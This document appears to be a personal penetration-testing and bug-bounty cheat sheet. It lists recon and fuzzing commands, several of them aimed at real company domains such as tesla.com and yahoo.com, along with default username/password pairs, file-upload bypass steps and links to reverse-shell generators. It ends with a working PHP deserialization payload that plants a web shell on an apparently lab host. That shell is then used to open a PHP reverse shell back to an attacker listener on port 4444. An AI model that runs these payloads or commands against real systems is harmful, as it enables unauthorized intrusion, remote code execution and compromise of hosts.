Recon:

Subdomain Finder : Sublist3r, Amass, Subfinder, Censys, Assetnote, Findomain, SecurityTrails, Knockpy, DnsDumpster, Aquatone, Subdomz, Sub.sh, Assetfinder, Subbrute, Dnsx, Dnscan, 

DNS : MassDNS, DnsEnum, dnsrecon

Subdomain TakeOver: Subjack, Subzy, Subdominator, Subhunter

PortScan : rustscan, Nmap, MassScan

Screenshot : Aquatone

Other Tools:
https://github.com/jawa77/automic
https://dash.pugrecon.celes.in/
https://chaos.projectdiscovery.io/
https://github.com/eredotpkfr/subscan
https://github.com/depro0x/deplist

Command:
sublist3r -d tesla.com -o tesla_subdomains.txt
amass enum -d tesla.com -o amass_tesla_output.txt
subfinder -d tesla.com -o tesla_subdomains.txt
findomain -t tesla.com -o abc.txt

subfinder -d radicate.com -all -recursive -o subdomain.txt | grep "admin"
subfinder -d radicate.com -all -recursive | grep "admin"
cat subdomain.txt | aquatone

theharvester -h
theHarvester -d hackaday.com -l 300 -b google
theHarvester -d hackaday.com -l 300 -b all
theharvester -d hackaday.com -l 10 -b all

Default Creds:
admin/admin
admin/password123
admin/123456
Guest/Guest
test/test

--Recon--

rustscan -a 127.0.0.1
nmap -p 21,22,80 -sV 127.0.0.1

sudo nmap -p 21, 22, 23, 25, 53, 67, 68, 80, 110, 137, 138, 139, 143, 161, 162, 389, 443, 445, 465, 514, 548, 587, 636, 993, 995, 1433, 1521, 1701, 1723, 3306, 3389, 5432, 5900, 8008, 8080, 8443 127.0.0.1

ffuf -w /usr/share/wordllists/dirb/common.txt -u https://127.0.0.1/FUZZ -p 1 

shodan
shodan init <API_Key>
shodan count wordpress
shodan count wordpress 1.2.7
shodan download wordpressfile "wordpress 1.2.7"
shodan host 127.0.0.1
shodan scan -h
shodan scan submit 127.0.0.1

Command: host, ping, dig, nslookup, whois, 

Shodan Dorks: https://www.shodan.io/search/examples

Checklist:
https://github.com/tuhin1729/Bug-Bounty-Methodology
https://github.com/shubhdhungana/bug_bounty_checklist
https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist
https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md


tools : httpprobe, qsreplace, waybackurls, amass, sublist3r, nmap,

cat abc.xyz | waybackurls > abc.txt
amass enum -passive -d abc.xyz
cat abc.txt | httprobe

sublist3r -d yahoo.com
dirb yahoo.com

nmap -A -p 21, 22, 23, 25, 53, 67, 68, 80, 110, 137, 138, 139, 143, 161, 162, 389, 443, 445, 465, 514, 548, 587, 636, 993, 995, 1433, 1521, 1701, 1723, 3306, 3389, 5432, 5900, 8008, 8080, 8443 127.0.0.1
ffuf -u https://FUZZ.yahoo.com -w /usr/share/wordlists/dirb/common.txt -p 1
ffuf -u https://yahoo.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -p 1 -fc 301
ffuf -u https://api.yahoo.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -p 1 -fc 301

wpscan --url 127.0.0.1 -e ap --plugins-detection aggressive

Recon:

sublist3r -d yahoo.com
amass enum -d -passive -d yahoo.com
dirb www.yahoo.com
nikto -h 127.0.0.1
dig www.abc.com

ffuf -w /usr/share/wordlists/dirb/small.txt -u https://www.yahoo.com/FUZZ
ffuf -w /usr/share/wordlists/dirb/small.txt -u https://www.yahoo.com/FUZZ -fl 1

wpscan --url 127.0.0.1 -e ap --plugins-detection aggressive

URL Testing::

--> Always see the source code and see js,css code
--> Find the hidden parameter
--> Always digging hidden Directory and digg every files and folders



























File Upload Vulnerability::

Php Shell : https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html
Php Shell Cheatsheet : https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Php Shell Cheatsheet : https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/

-> First upload any pic like jpg,png etc
-> intercept with burp and copy some {6/7} Line form header {content-type}
-> Paste those code before php code in your uploaded file
-> if file upload then Bhoom!!

Reverse shell online:

https://www.revshells.com/
https://tex2e.github.io/reverse-shell-generator/index.html
https://b00st3d.github.io/

For Triggering : nc -lvnp 4444

Tips : First find the file uploader and then find upload path and bypass the upload and bhoom!!!!

Wordpress:

ping 127.0.0.1
gobuster dir -u 127.0.0.1 -w wordlist.txt -x php
ffuf -u http://localhost:3000/FUZZ -w wordlist.txt
ffuf -u http://localhost:3000/FUZZ -w wordlist.txt -e .php,.html,.txt
ffuf -u http://localhost:3000/FUZZ -w wordlist.txt -e .php,.html,.txt -mc 200

10.10.10.223/sator.php?arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:7:"pwn.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";}
payload is : O:14:"DatabaseExport":2:{s:9:"user_file";s:7:"pwn.php";s:4:"data";s:30:"<?php system($_GET["cmd"]); ?>";}

10.10.10.223/pwn.php?cmd=php -r '$sock=fsockopen("10.10.14.7",4444);exec("/bin/bash -i <&3 >&3 2>&3");' [nc -lvnp 4444]










